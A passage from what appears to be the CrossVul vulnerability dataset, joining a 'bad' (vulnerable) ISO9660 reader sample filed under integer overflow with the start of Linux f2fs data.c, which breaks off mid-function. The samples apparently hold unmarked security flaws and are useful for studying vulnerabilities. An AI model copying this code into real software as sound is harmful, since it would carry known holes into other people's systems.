toi(const void *p, int n)
{
const unsigned char *v = (const unsigned char *)p;
if (n > 1)
return v[0] + 256 * toi(v + 1, n - 1);
if (n == 1)
return v[0];
return (0);
}
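/*
 * Illustrative sketch: toi() decodes an n-byte unsigned little-endian
 * integer, i.e. v[0] + 256 * v[1] + 256 * 256 * v[2] + ... .  The check
 * below is hypothetical, assumes <assert.h>, and is kept under "#if 0".
 */
#if 0
static void
example_toi_little_endian(void)
{
	static const unsigned char v[2] = { 0x34, 0x12 };

	assert(toi(v, 2) == 0x1234);	/* 0x34 + 256 * 0x12 */
}
#endif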
static time_t
isodate7(const unsigned char *v)
{
struct tm tm;
int offset;
time_t t;
memset(&tm, 0, sizeof(tm));
tm.tm_year = v[0];
tm.tm_mon = v[1] - 1;
tm.tm_mday = v[2];
tm.tm_hour = v[3];
tm.tm_min = v[4];
tm.tm_sec = v[5];
/* v[6] is the signed timezone offset, in 1/4-hour increments. */
offset = ((const signed char *)v)[6];
if (offset > -48 && offset < 52) {
tm.tm_hour -= offset / 4;
tm.tm_min -= (offset % 4) * 15;
}
t = time_from_tm(&tm);
if (t == (time_t)-1)
return ((time_t)0);
return (t);
}
static time_t
isodate17(const unsigned char *v)
{
struct tm tm;
int offset;
time_t t;
memset(&tm, 0, sizeof(tm));
tm.tm_year = (v[0] - '0') * 1000 + (v[1] - '0') * 100
+ (v[2] - '0') * 10 + (v[3] - '0')
- 1900;
tm.tm_mon = (v[4] - '0') * 10 + (v[5] - '0');
tm.tm_mday = (v[6] - '0') * 10 + (v[7] - '0');
tm.tm_hour = (v[8] - '0') * 10 + (v[9] - '0');
tm.tm_min = (v[10] - '0') * 10 + (v[11] - '0');
tm.tm_sec = (v[12] - '0') * 10 + (v[13] - '0');
/* v[16] is the signed timezone offset, in 1/4-hour increments. */
offset = ((const signed char *)v)[16];
if (offset > -48 && offset < 52) {
tm.tm_hour -= offset / 4;
tm.tm_min -= (offset % 4) * 15;
}
t = time_from_tm(&tm);
if (t == (time_t)-1)
return ((time_t)0);
return (t);
}
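/*
 * Illustrative sketch: in both date formats the trailing byte is a
 * signed timezone offset in quarter hours, which is subtracted to turn
 * the recorded local time into UTC.  The check below is hypothetical,
 * assumes <assert.h>, and is kept under "#if 0".
 */
#if 0
static void
example_isodate7_timezone(void)
{
	/* 2000-01-01 12:00:00 at UTC+1 (offset = 4 quarter hours). */
	static const unsigned char d[7] = { 100, 1, 1, 12, 0, 0, 4 };

	assert(isodate7(d) == (time_t)946724400);	/* 11:00:00 UTC */
}
#endif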
static time_t
time_from_tm(struct tm *t)
{
#if HAVE_TIMEGM
/* Use platform timegm() if available. */
return (timegm(t));
#elif HAVE__MKGMTIME64
return (_mkgmtime64(t));
#else
/* Else use direct calculation using POSIX assumptions. */
/* First, fix up tm_yday based on the year/month/day. */
if (mktime(t) == (time_t)-1)
return ((time_t)-1);
/* Then we can compute timegm() from first principles. */
return (t->tm_sec
+ t->tm_min * 60
+ t->tm_hour * 3600
+ t->tm_yday * 86400
+ (t->tm_year - 70) * 31536000
+ ((t->tm_year - 69) / 4) * 86400
- ((t->tm_year - 1) / 100) * 86400
+ ((t->tm_year + 299) / 400) * 86400);
#endif
}
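/*
 * Illustrative sketch: the direct computation above can be checked
 * against a well-known epoch value.  The helper below is hypothetical,
 * assumes <assert.h>, and is kept under "#if 0".
 */
#if 0
static void
example_time_from_tm(void)
{
	struct tm t;

	memset(&t, 0, sizeof(t));
	t.tm_year = 100;	/* years since 1900 => 2000 */
	t.tm_mon = 0;
	t.tm_mday = 1;
	/* 2000-01-01 00:00:00 UTC is 946684800 seconds since the epoch. */
	assert(time_from_tm(&t) == (time_t)946684800);
}
#endif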
static const char *
build_pathname(struct archive_string *as, struct file_info *file, int depth)
{
// Plain ISO9660 only allows 8 dir levels; if we get
// to 1000, then something is very, very wrong.
if (depth > 1000) {
return NULL;
}
if (file->parent != NULL && archive_strlen(&file->parent->name) > 0) {
if (build_pathname(as, file->parent, depth + 1) == NULL) {
return NULL;
}
archive_strcat(as, "/");
}
if (archive_strlen(&file->name) == 0)
archive_strcat(as, ".");
else
archive_string_concat(as, &file->name);
return (as->s);
}
static int
build_pathname_utf16be(unsigned char *p, size_t max, size_t *len,
struct file_info *file)
{
if (file->parent != NULL && file->parent->utf16be_bytes > 0) {
if (build_pathname_utf16be(p, max, len, file->parent) != 0)
return (-1);
p[*len] = 0;
p[*len + 1] = '/';
*len += 2;
}
if (file->utf16be_bytes == 0) {
if (*len + 2 > max)
return (-1);/* Path is too long! */
p[*len] = 0;
p[*len + 1] = '.';
*len += 2;
} else {
if (*len + file->utf16be_bytes > max)
return (-1);/* Path is too long! */
memcpy(p + *len, file->utf16be_name, file->utf16be_bytes);
*len += file->utf16be_bytes;
}
return (0);
}
#if DEBUG
static void
dump_isodirrec(FILE *out, const unsigned char *isodirrec)
{
fprintf(out, " l %d,",
toi(isodirrec + DR_length_offset, DR_length_size));
fprintf(out, " a %d,",
toi(isodirrec + DR_ext_attr_length_offset, DR_ext_attr_length_size));
fprintf(out, " ext 0x%x,",
toi(isodirrec + DR_extent_offset, DR_extent_size));
fprintf(out, " s %d,",
toi(isodirrec + DR_size_offset, DR_extent_size));
fprintf(out, " f 0x%x,",
toi(isodirrec + DR_flags_offset, DR_flags_size));
fprintf(out, " u %d,",
toi(isodirrec + DR_file_unit_size_offset, DR_file_unit_size_size));
fprintf(out, " ilv %d,",
toi(isodirrec + DR_interleave_offset, DR_interleave_size));
fprintf(out, " seq %d,",
toi(isodirrec + DR_volume_sequence_number_offset,
DR_volume_sequence_number_size));
fprintf(out, " nl %d:",
toi(isodirrec + DR_name_len_offset, DR_name_len_size));
fprintf(out, " `%.*s'",
toi(isodirrec + DR_name_len_offset, DR_name_len_size),
isodirrec + DR_name_offset);
}
#endif
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_5181_0 |
crossvul-cpp_data_bad_3028_0 | /*
* fs/f2fs/data.c
*
* Copyright (c) 2012 Samsung Electronics Co., Ltd.
* http://www.samsung.com/
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*/
#include <linux/fs.h>
#include <linux/f2fs_fs.h>
#include <linux/buffer_head.h>
#include <linux/mpage.h>
#include <linux/writeback.h>
#include <linux/backing-dev.h>
#include <linux/pagevec.h>
#include <linux/blkdev.h>
#include <linux/bio.h>
#include <linux/prefetch.h>
#include <linux/uio.h>
#include <linux/mm.h>
#include <linux/memcontrol.h>
#include <linux/cleancache.h>
#include "f2fs.h"
#include "node.h"
#include "segment.h"
#include "trace.h"
#include <trace/events/f2fs.h>
static bool __is_cp_guaranteed(struct page *page)
{
struct address_space *mapping = page->mapping;
struct inode *inode;
struct f2fs_sb_info *sbi;
if (!mapping)
return false;
inode = mapping->host;
sbi = F2FS_I_SB(inode);
if (inode->i_ino == F2FS_META_INO(sbi) ||
inode->i_ino == F2FS_NODE_INO(sbi) ||
S_ISDIR(inode->i_mode) ||
is_cold_data(page))
return true;
return false;
}
static void f2fs_read_end_io(struct bio *bio)
{
struct bio_vec *bvec;
int i;
#ifdef CONFIG_F2FS_FAULT_INJECTION
if (time_to_inject(F2FS_P_SB(bio->bi_io_vec->bv_page), FAULT_IO))
bio->bi_error = -EIO;
#endif
if (f2fs_bio_encrypted(bio)) {
if (bio->bi_error) {
fscrypt_release_ctx(bio->bi_private);
} else {
fscrypt_decrypt_bio_pages(bio->bi_private, bio);
return;
}
}
bio_for_each_segment_all(bvec, bio, i) {
struct page *page = bvec->bv_page;
if (!bio->bi_error) {
if (!PageUptodate(page))
SetPageUptodate(page);
} else {
ClearPageUptodate(page);
SetPageError(page);
}
unlock_page(page);
}
bio_put(bio);
}
static void f2fs_write_end_io(struct bio *bio)
{
struct f2fs_sb_info *sbi = bio->bi_private;
struct bio_vec *bvec;
int i;
bio_for_each_segment_all(bvec, bio, i) {
struct page *page = bvec->bv_page;
enum count_type type = WB_DATA_TYPE(page);
if (IS_DUMMY_WRITTEN_PAGE(page)) {
set_page_private(page, (unsigned long)NULL);
ClearPagePrivate(page);
unlock_page(page);
mempool_free(page, sbi->write_io_dummy);
if (unlikely(bio->bi_error))
f2fs_stop_checkpoint(sbi, true);
continue;
}
fscrypt_pullback_bio_page(&page, true);
if (unlikely(bio->bi_error)) {
mapping_set_error(page->mapping, -EIO);
f2fs_stop_checkpoint(sbi, true);
}
dec_page_count(sbi, type);
clear_cold_data(page);
end_page_writeback(page);
}
if (!get_pages(sbi, F2FS_WB_CP_DATA) &&
wq_has_sleeper(&sbi->cp_wait))
wake_up(&sbi->cp_wait);
bio_put(bio);
}
/*
 * Map a global block address to the member device that backs it and,
 * if a bio is given, point the bio at that device and sector.
 */
struct block_device *f2fs_target_device(struct f2fs_sb_info *sbi,
block_t blk_addr, struct bio *bio)
{
struct block_device *bdev = sbi->sb->s_bdev;
int i;
for (i = 0; i < sbi->s_ndevs; i++) {
if (FDEV(i).start_blk <= blk_addr &&
FDEV(i).end_blk >= blk_addr) {
blk_addr -= FDEV(i).start_blk;
bdev = FDEV(i).bdev;
break;
}
}
if (bio) {
bio->bi_bdev = bdev;
bio->bi_iter.bi_sector = SECTOR_FROM_BLOCK(blk_addr);
}
return bdev;
}
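/*
 * Illustrative sketch: on a multi-device image the global block address
 * space is the concatenation of the member devices, so an address is
 * rebased by subtracting the start block of the device that covers it.
 * The numbers below are hypothetical (two devices of 1000 blocks each),
 * assume <assert.h>, and are kept under "#if 0".
 */
#if 0
static void example_target_device_rebase(void)
{
	block_t start_blk = 1000;	/* second device starts here */
	block_t blk_addr = 1500;	/* global address to translate */

	assert(blk_addr - start_blk == 500);	/* offset within that bdev */
}
#endif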
int f2fs_target_device_index(struct f2fs_sb_info *sbi, block_t blkaddr)
{
int i;
for (i = 0; i < sbi->s_ndevs; i++)
if (FDEV(i).start_blk <= blkaddr && FDEV(i).end_blk >= blkaddr)
return i;
return 0;
}
static bool __same_bdev(struct f2fs_sb_info *sbi,
block_t blk_addr, struct bio *bio)
{
return f2fs_target_device(sbi, blk_addr, NULL) == bio->bi_bdev;
}
/*
* Low-level block read/write IO operations.
*/
static struct bio *__bio_alloc(struct f2fs_sb_info *sbi, block_t blk_addr,
int npages, bool is_read)
{
struct bio *bio;
bio = f2fs_bio_alloc(npages);
f2fs_target_device(sbi, blk_addr, bio);
bio->bi_end_io = is_read ? f2fs_read_end_io : f2fs_write_end_io;
bio->bi_private = is_read ? NULL : sbi;
return bio;
}
static inline void __submit_bio(struct f2fs_sb_info *sbi,
struct bio *bio, enum page_type type)
{
if (!is_read_io(bio_op(bio))) {
unsigned int start;
if (f2fs_sb_mounted_blkzoned(sbi->sb) &&
current->plug && (type == DATA || type == NODE))
blk_finish_plug(current->plug);
if (type != DATA && type != NODE)
goto submit_io;
start = bio->bi_iter.bi_size >> F2FS_BLKSIZE_BITS;
start %= F2FS_IO_SIZE(sbi);
if (start == 0)
goto submit_io;
/* fill dummy pages */
for (; start < F2FS_IO_SIZE(sbi); start++) {
struct page *page =
mempool_alloc(sbi->write_io_dummy,
GFP_NOIO | __GFP_ZERO | __GFP_NOFAIL);
f2fs_bug_on(sbi, !page);
SetPagePrivate(page);
set_page_private(page, (unsigned long)DUMMY_WRITTEN_PAGE);
lock_page(page);
if (bio_add_page(bio, page, PAGE_SIZE, 0) < PAGE_SIZE)
f2fs_bug_on(sbi, 1);
}
/*
 * In the NODE case, we lose the next block address chain, so we
 * need to do a checkpoint in f2fs_sync_file.
 */
if (type == NODE)
set_sbi_flag(sbi, SBI_NEED_CP);
}
submit_io:
if (is_read_io(bio_op(bio)))
trace_f2fs_submit_read_bio(sbi->sb, type, bio);
else
trace_f2fs_submit_write_bio(sbi->sb, type, bio);
submit_bio(bio);
}
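/*
 * Illustrative sketch: when writes must be issued in units of
 * F2FS_IO_SIZE blocks, a partially filled bio is padded with dummy
 * pages up to that boundary.  The numbers below are hypothetical
 * (IO size of 8 blocks, 5 real pages already in the bio), assume
 * <assert.h>, and are kept under "#if 0".
 */
#if 0
static void example_io_size_padding(void)
{
	unsigned int io_size = 8;	/* F2FS_IO_SIZE(sbi), in blocks */
	unsigned int start = 5;		/* blocks already in the bio */

	assert(io_size - (start % io_size) == 3);	/* dummy pages to add */
}
#endif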
static void __submit_merged_bio(struct f2fs_bio_info *io)
{
struct f2fs_io_info *fio = &io->fio;
if (!io->bio)
return;
bio_set_op_attrs(io->bio, fio->op, fio->op_flags);
if (is_read_io(fio->op))
trace_f2fs_prepare_read_bio(io->sbi->sb, fio->type, io->bio);
else
trace_f2fs_prepare_write_bio(io->sbi->sb, fio->type, io->bio);
__submit_bio(io->sbi, io->bio, fio->type);
io->bio = NULL;
}
static bool __has_merged_page(struct f2fs_bio_info *io, struct inode *inode,
struct page *page, nid_t ino)
{
struct bio_vec *bvec;
struct page *target;
int i;
if (!io->bio)
return false;
if (!inode && !page && !ino)
return true;
bio_for_each_segment_all(bvec, io->bio, i) {
if (bvec->bv_page->mapping)
target = bvec->bv_page;
else
target = fscrypt_control_page(bvec->bv_page);
if (inode && inode == target->mapping->host)
return true;
if (page && page == target)
return true;
if (ino && ino == ino_of_node(target))
return true;
}
return false;
}
static bool has_merged_page(struct f2fs_sb_info *sbi, struct inode *inode,
struct page *page, nid_t ino,
enum page_type type)
{
enum page_type btype = PAGE_TYPE_OF_BIO(type);
struct f2fs_bio_info *io = &sbi->write_io[btype];
bool ret;
down_read(&io->io_rwsem);
ret = __has_merged_page(io, inode, page, ino);
up_read(&io->io_rwsem);
return ret;
}
static void __f2fs_submit_merged_bio(struct f2fs_sb_info *sbi,
struct inode *inode, struct page *page,
nid_t ino, enum page_type type, int rw)
{
enum page_type btype = PAGE_TYPE_OF_BIO(type);
struct f2fs_bio_info *io;
io = is_read_io(rw) ? &sbi->read_io : &sbi->write_io[btype];
down_write(&io->io_rwsem);
if (!__has_merged_page(io, inode, page, ino))
goto out;
/* change META to META_FLUSH in the checkpoint procedure */
if (type >= META_FLUSH) {
io->fio.type = META_FLUSH;
io->fio.op = REQ_OP_WRITE;
io->fio.op_flags = REQ_PREFLUSH | REQ_META | REQ_PRIO;
if (!test_opt(sbi, NOBARRIER))
io->fio.op_flags |= REQ_FUA;
}
__submit_merged_bio(io);
out:
up_write(&io->io_rwsem);
}
void f2fs_submit_merged_bio(struct f2fs_sb_info *sbi, enum page_type type,
int rw)
{
__f2fs_submit_merged_bio(sbi, NULL, NULL, 0, type, rw);
}
void f2fs_submit_merged_bio_cond(struct f2fs_sb_info *sbi,
struct inode *inode, struct page *page,
nid_t ino, enum page_type type, int rw)
{
if (has_merged_page(sbi, inode, page, ino, type))
__f2fs_submit_merged_bio(sbi, inode, page, ino, type, rw);
}
void f2fs_flush_merged_bios(struct f2fs_sb_info *sbi)
{
f2fs_submit_merged_bio(sbi, DATA, WRITE);
f2fs_submit_merged_bio(sbi, NODE, WRITE);
f2fs_submit_merged_bio(sbi, META, WRITE);
}
/*
 * Fill the locked page with the data located at the given block address.
 * Return the page unlocked.
 */
int f2fs_submit_page_bio(struct f2fs_io_info *fio)
{
struct bio *bio;
struct page *page = fio->encrypted_page ?
fio->encrypted_page : fio->page;
trace_f2fs_submit_page_bio(page, fio);
f2fs_trace_ios(fio, 0);
/* Allocate a new bio */
bio = __bio_alloc(fio->sbi, fio->new_blkaddr, 1, is_read_io(fio->op));
if (bio_add_page(bio, page, PAGE_SIZE, 0) < PAGE_SIZE) {
bio_put(bio);
return -EFAULT;
}
bio_set_op_attrs(bio, fio->op, fio->op_flags);
__submit_bio(fio->sbi, bio, fio->type);
return 0;
}
int f2fs_submit_page_mbio(struct f2fs_io_info *fio)
{
struct f2fs_sb_info *sbi = fio->sbi;
enum page_type btype = PAGE_TYPE_OF_BIO(fio->type);
struct f2fs_bio_info *io;
bool is_read = is_read_io(fio->op);
struct page *bio_page;
int err = 0;
io = is_read ? &sbi->read_io : &sbi->write_io[btype];
if (fio->old_blkaddr != NEW_ADDR)
verify_block_addr(sbi, fio->old_blkaddr);
verify_block_addr(sbi, fio->new_blkaddr);
bio_page = fio->encrypted_page ? fio->encrypted_page : fio->page;
if (!is_read)
inc_page_count(sbi, WB_DATA_TYPE(bio_page));
down_write(&io->io_rwsem);
if (io->bio && (io->last_block_in_bio != fio->new_blkaddr - 1 ||
(io->fio.op != fio->op || io->fio.op_flags != fio->op_flags) ||
!__same_bdev(sbi, fio->new_blkaddr, io->bio)))
__submit_merged_bio(io);
alloc_new:
if (io->bio == NULL) {
if ((fio->type == DATA || fio->type == NODE) &&
fio->new_blkaddr & F2FS_IO_SIZE_MASK(sbi)) {
err = -EAGAIN;
dec_page_count(sbi, WB_DATA_TYPE(bio_page));
goto out_fail;
}
io->bio = __bio_alloc(sbi, fio->new_blkaddr,
BIO_MAX_PAGES, is_read);
io->fio = *fio;
}
if (bio_add_page(io->bio, bio_page, PAGE_SIZE, 0) <
PAGE_SIZE) {
__submit_merged_bio(io);
goto alloc_new;
}
io->last_block_in_bio = fio->new_blkaddr;
f2fs_trace_ios(fio, 0);
out_fail:
up_write(&io->io_rwsem);
trace_f2fs_submit_page_mbio(fio->page, fio);
return err;
}
static void __set_data_blkaddr(struct dnode_of_data *dn)
{
struct f2fs_node *rn = F2FS_NODE(dn->node_page);
__le32 *addr_array;
/* Get physical address of data block */
addr_array = blkaddr_in_node(rn);
addr_array[dn->ofs_in_node] = cpu_to_le32(dn->data_blkaddr);
}
/*
* Lock ordering for the change of data block address:
* ->data_page
* ->node_page
* update block addresses in the node page
*/
void set_data_blkaddr(struct dnode_of_data *dn)
{
f2fs_wait_on_page_writeback(dn->node_page, NODE, true);
__set_data_blkaddr(dn);
if (set_page_dirty(dn->node_page))
dn->node_changed = true;
}
void f2fs_update_data_blkaddr(struct dnode_of_data *dn, block_t blkaddr)
{
dn->data_blkaddr = blkaddr;
set_data_blkaddr(dn);
f2fs_update_extent_cache(dn);
}
/* dn->ofs_in_node will be returned with up-to-date last block pointer */
int reserve_new_blocks(struct dnode_of_data *dn, blkcnt_t count)
{
struct f2fs_sb_info *sbi = F2FS_I_SB(dn->inode);
if (!count)
return 0;
if (unlikely(is_inode_flag_set(dn->inode, FI_NO_ALLOC)))
return -EPERM;
if (unlikely(!inc_valid_block_count(sbi, dn->inode, &count)))
return -ENOSPC;
trace_f2fs_reserve_new_blocks(dn->inode, dn->nid,
dn->ofs_in_node, count);
f2fs_wait_on_page_writeback(dn->node_page, NODE, true);
for (; count > 0; dn->ofs_in_node++) {
block_t blkaddr =
datablock_addr(dn->node_page, dn->ofs_in_node);
if (blkaddr == NULL_ADDR) {
dn->data_blkaddr = NEW_ADDR;
__set_data_blkaddr(dn);
count--;
}
}
if (set_page_dirty(dn->node_page))
dn->node_changed = true;
return 0;
}
/* Should keep dn->ofs_in_node unchanged */
int reserve_new_block(struct dnode_of_data *dn)
{
unsigned int ofs_in_node = dn->ofs_in_node;
int ret;
ret = reserve_new_blocks(dn, 1);
dn->ofs_in_node = ofs_in_node;
return ret;
}
int f2fs_reserve_block(struct dnode_of_data *dn, pgoff_t index)
{
bool need_put = dn->inode_page ? false : true;
int err;
err = get_dnode_of_data(dn, index, ALLOC_NODE);
if (err)
return err;
if (dn->data_blkaddr == NULL_ADDR)
err = reserve_new_block(dn);
if (err || need_put)
f2fs_put_dnode(dn);
return err;
}
int f2fs_get_block(struct dnode_of_data *dn, pgoff_t index)
{
struct extent_info ei;
struct inode *inode = dn->inode;
if (f2fs_lookup_extent_cache(inode, index, &ei)) {
dn->data_blkaddr = ei.blk + index - ei.fofs;
return 0;
}
return f2fs_reserve_block(dn, index);
}
struct page *get_read_data_page(struct inode *inode, pgoff_t index,
int op_flags, bool for_write)
{
struct address_space *mapping = inode->i_mapping;
struct dnode_of_data dn;
struct page *page;
struct extent_info ei;
int err;
struct f2fs_io_info fio = {
.sbi = F2FS_I_SB(inode),
.type = DATA,
.op = REQ_OP_READ,
.op_flags = op_flags,
.encrypted_page = NULL,
};
if (f2fs_encrypted_inode(inode) && S_ISREG(inode->i_mode))
return read_mapping_page(mapping, index, NULL);
page = f2fs_grab_cache_page(mapping, index, for_write);
if (!page)
return ERR_PTR(-ENOMEM);
if (f2fs_lookup_extent_cache(inode, index, &ei)) {
dn.data_blkaddr = ei.blk + index - ei.fofs;
goto got_it;
}
set_new_dnode(&dn, inode, NULL, NULL, 0);
err = get_dnode_of_data(&dn, index, LOOKUP_NODE);
if (err)
goto put_err;
f2fs_put_dnode(&dn);
if (unlikely(dn.data_blkaddr == NULL_ADDR)) {
err = -ENOENT;
goto put_err;
}
got_it:
if (PageUptodate(page)) {
unlock_page(page);
return page;
}
/*
 * A new dentry page is allocated but cannot be written, since its
 * new inode page couldn't be allocated due to -ENOSPC.
 * In such a case, its blkaddr can remain NEW_ADDR.
 * See f2fs_add_link -> get_new_data_page -> init_inode_metadata.
 */
if (dn.data_blkaddr == NEW_ADDR) {
zero_user_segment(page, 0, PAGE_SIZE);
if (!PageUptodate(page))
SetPageUptodate(page);
unlock_page(page);
return page;
}
fio.new_blkaddr = fio.old_blkaddr = dn.data_blkaddr;
fio.page = page;
err = f2fs_submit_page_bio(&fio);
if (err)
goto put_err;
return page;
put_err:
f2fs_put_page(page, 1);
return ERR_PTR(err);
}
struct page *find_data_page(struct inode *inode, pgoff_t index)
{
struct address_space *mapping = inode->i_mapping;
struct page *page;
page = find_get_page(mapping, index);
if (page && PageUptodate(page))
return page;
f2fs_put_page(page, 0);
page = get_read_data_page(inode, index, 0, false);
if (IS_ERR(page))
return page;
if (PageUptodate(page))
return page;
wait_on_page_locked(page);
if (unlikely(!PageUptodate(page))) {
f2fs_put_page(page, 0);
return ERR_PTR(-EIO);
}
return page;
}
/*
* If it tries to access a hole, return an error.
* Because, the callers, functions in dir.c and GC, should be able to know
* whether this page exists or not.
*/
struct page *get_lock_data_page(struct inode *inode, pgoff_t index,
bool for_write)
{
struct address_space *mapping = inode->i_mapping;
struct page *page;
repeat:
page = get_read_data_page(inode, index, 0, for_write);
if (IS_ERR(page))
return page;
/* wait for read completion */
lock_page(page);
if (unlikely(page->mapping != mapping)) {
f2fs_put_page(page, 1);
goto repeat;
}
if (unlikely(!PageUptodate(page))) {
f2fs_put_page(page, 1);
return ERR_PTR(-EIO);
}
return page;
}
/*
* Caller ensures that this data page is never allocated.
* A new zero-filled data page is allocated in the page cache.
*
* Also, caller should grab and release a rwsem by calling f2fs_lock_op() and
* f2fs_unlock_op().
 * Note that ipage is set only by make_empty_dir, and if any error occurs,
 * ipage should be released by this function.
*/
struct page *get_new_data_page(struct inode *inode,
struct page *ipage, pgoff_t index, bool new_i_size)
{
struct address_space *mapping = inode->i_mapping;
struct page *page;
struct dnode_of_data dn;
int err;
page = f2fs_grab_cache_page(mapping, index, true);
if (!page) {
/*
 * Before exiting, we should make sure ipage is released
 * if any error occurs.
 */
f2fs_put_page(ipage, 1);
return ERR_PTR(-ENOMEM);
}
set_new_dnode(&dn, inode, ipage, NULL, 0);
err = f2fs_reserve_block(&dn, index);
if (err) {
f2fs_put_page(page, 1);
return ERR_PTR(err);
}
if (!ipage)
f2fs_put_dnode(&dn);
if (PageUptodate(page))
goto got_it;
if (dn.data_blkaddr == NEW_ADDR) {
zero_user_segment(page, 0, PAGE_SIZE);
if (!PageUptodate(page))
SetPageUptodate(page);
} else {
f2fs_put_page(page, 1);
/* if ipage exists, blkaddr should be NEW_ADDR */
f2fs_bug_on(F2FS_I_SB(inode), ipage);
page = get_lock_data_page(inode, index, true);
if (IS_ERR(page))
return page;
}
got_it:
if (new_i_size && i_size_read(inode) <
((loff_t)(index + 1) << PAGE_SHIFT))
f2fs_i_size_write(inode, ((loff_t)(index + 1) << PAGE_SHIFT));
return page;
}
static int __allocate_data_block(struct dnode_of_data *dn)
{
struct f2fs_sb_info *sbi = F2FS_I_SB(dn->inode);
struct f2fs_summary sum;
struct node_info ni;
pgoff_t fofs;
blkcnt_t count = 1;
if (unlikely(is_inode_flag_set(dn->inode, FI_NO_ALLOC)))
return -EPERM;
dn->data_blkaddr = datablock_addr(dn->node_page, dn->ofs_in_node);
if (dn->data_blkaddr == NEW_ADDR)
goto alloc;
if (unlikely(!inc_valid_block_count(sbi, dn->inode, &count)))
return -ENOSPC;
alloc:
get_node_info(sbi, dn->nid, &ni);
set_summary(&sum, dn->nid, dn->ofs_in_node, ni.version);
allocate_data_block(sbi, NULL, dn->data_blkaddr, &dn->data_blkaddr,
&sum, CURSEG_WARM_DATA);
set_data_blkaddr(dn);
/* update i_size */
fofs = start_bidx_of_node(ofs_of_node(dn->node_page), dn->inode) +
dn->ofs_in_node;
if (i_size_read(dn->inode) < ((loff_t)(fofs + 1) << PAGE_SHIFT))
f2fs_i_size_write(dn->inode,
((loff_t)(fofs + 1) << PAGE_SHIFT));
return 0;
}
static inline bool __force_buffered_io(struct inode *inode, int rw)
{
return ((f2fs_encrypted_inode(inode) && S_ISREG(inode->i_mode)) ||
(rw == WRITE && test_opt(F2FS_I_SB(inode), LFS)) ||
F2FS_I_SB(inode)->s_ndevs);
}
int f2fs_preallocate_blocks(struct kiocb *iocb, struct iov_iter *from)
{
struct inode *inode = file_inode(iocb->ki_filp);
struct f2fs_map_blocks map;
int err = 0;
if (is_inode_flag_set(inode, FI_NO_PREALLOC))
return 0;
map.m_lblk = F2FS_BLK_ALIGN(iocb->ki_pos);
map.m_len = F2FS_BYTES_TO_BLK(iocb->ki_pos + iov_iter_count(from));
if (map.m_len > map.m_lblk)
map.m_len -= map.m_lblk;
else
map.m_len = 0;
map.m_next_pgofs = NULL;
if (iocb->ki_flags & IOCB_DIRECT) {
err = f2fs_convert_inline_inode(inode);
if (err)
return err;
return f2fs_map_blocks(inode, &map, 1,
__force_buffered_io(inode, WRITE) ?
F2FS_GET_BLOCK_PRE_AIO :
F2FS_GET_BLOCK_PRE_DIO);
}
if (iocb->ki_pos + iov_iter_count(from) > MAX_INLINE_DATA) {
err = f2fs_convert_inline_inode(inode);
if (err)
return err;
}
if (!f2fs_has_inline_data(inode))
return f2fs_map_blocks(inode, &map, 1, F2FS_GET_BLOCK_PRE_AIO);
return err;
}
/*
 * f2fs_map_blocks() now supports readahead/bmap/rw direct_IO with
 * the f2fs_map_blocks structure.
* If original data blocks are allocated, then give them to blockdev.
* Otherwise,
* a. preallocate requested block addresses
* b. do not use extent cache for better performance
* c. give the block addresses to blockdev
*/
int f2fs_map_blocks(struct inode *inode, struct f2fs_map_blocks *map,
int create, int flag)
{
unsigned int maxblocks = map->m_len;
struct dnode_of_data dn;
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
int mode = create ? ALLOC_NODE : LOOKUP_NODE;
pgoff_t pgofs, end_offset, end;
int err = 0, ofs = 1;
unsigned int ofs_in_node, last_ofs_in_node;
blkcnt_t prealloc;
struct extent_info ei;
block_t blkaddr;
if (!maxblocks)
return 0;
map->m_len = 0;
map->m_flags = 0;
/* it only supports block size == page size */
pgofs = (pgoff_t)map->m_lblk;
end = pgofs + maxblocks;
if (!create && f2fs_lookup_extent_cache(inode, pgofs, &ei)) {
map->m_pblk = ei.blk + pgofs - ei.fofs;
map->m_len = min((pgoff_t)maxblocks, ei.fofs + ei.len - pgofs);
map->m_flags = F2FS_MAP_MAPPED;
goto out;
}
next_dnode:
if (create)
f2fs_lock_op(sbi);
/* When reading holes, we need its node page */
set_new_dnode(&dn, inode, NULL, NULL, 0);
err = get_dnode_of_data(&dn, pgofs, mode);
if (err) {
if (flag == F2FS_GET_BLOCK_BMAP)
map->m_pblk = 0;
if (err == -ENOENT) {
err = 0;
if (map->m_next_pgofs)
*map->m_next_pgofs =
get_next_page_offset(&dn, pgofs);
}
goto unlock_out;
}
prealloc = 0;
last_ofs_in_node = ofs_in_node = dn.ofs_in_node;
end_offset = ADDRS_PER_PAGE(dn.node_page, inode);
next_block:
blkaddr = datablock_addr(dn.node_page, dn.ofs_in_node);
if (blkaddr == NEW_ADDR || blkaddr == NULL_ADDR) {
if (create) {
if (unlikely(f2fs_cp_error(sbi))) {
err = -EIO;
goto sync_out;
}
if (flag == F2FS_GET_BLOCK_PRE_AIO) {
if (blkaddr == NULL_ADDR) {
prealloc++;
last_ofs_in_node = dn.ofs_in_node;
}
} else {
err = __allocate_data_block(&dn);
if (!err)
set_inode_flag(inode, FI_APPEND_WRITE);
}
if (err)
goto sync_out;
map->m_flags = F2FS_MAP_NEW;
blkaddr = dn.data_blkaddr;
} else {
if (flag == F2FS_GET_BLOCK_BMAP) {
map->m_pblk = 0;
goto sync_out;
}
if (flag == F2FS_GET_BLOCK_FIEMAP &&
blkaddr == NULL_ADDR) {
if (map->m_next_pgofs)
*map->m_next_pgofs = pgofs + 1;
}
if (flag != F2FS_GET_BLOCK_FIEMAP ||
blkaddr != NEW_ADDR)
goto sync_out;
}
}
if (flag == F2FS_GET_BLOCK_PRE_AIO)
goto skip;
if (map->m_len == 0) {
/* preallocated unwritten block should be mapped for fiemap. */
if (blkaddr == NEW_ADDR)
map->m_flags |= F2FS_MAP_UNWRITTEN;
map->m_flags |= F2FS_MAP_MAPPED;
map->m_pblk = blkaddr;
map->m_len = 1;
} else if ((map->m_pblk != NEW_ADDR &&
blkaddr == (map->m_pblk + ofs)) ||
(map->m_pblk == NEW_ADDR && blkaddr == NEW_ADDR) ||
flag == F2FS_GET_BLOCK_PRE_DIO) {
ofs++;
map->m_len++;
} else {
goto sync_out;
}
skip:
dn.ofs_in_node++;
pgofs++;
/* preallocate blocks in batch for one dnode page */
if (flag == F2FS_GET_BLOCK_PRE_AIO &&
(pgofs == end || dn.ofs_in_node == end_offset)) {
dn.ofs_in_node = ofs_in_node;
err = reserve_new_blocks(&dn, prealloc);
if (err)
goto sync_out;
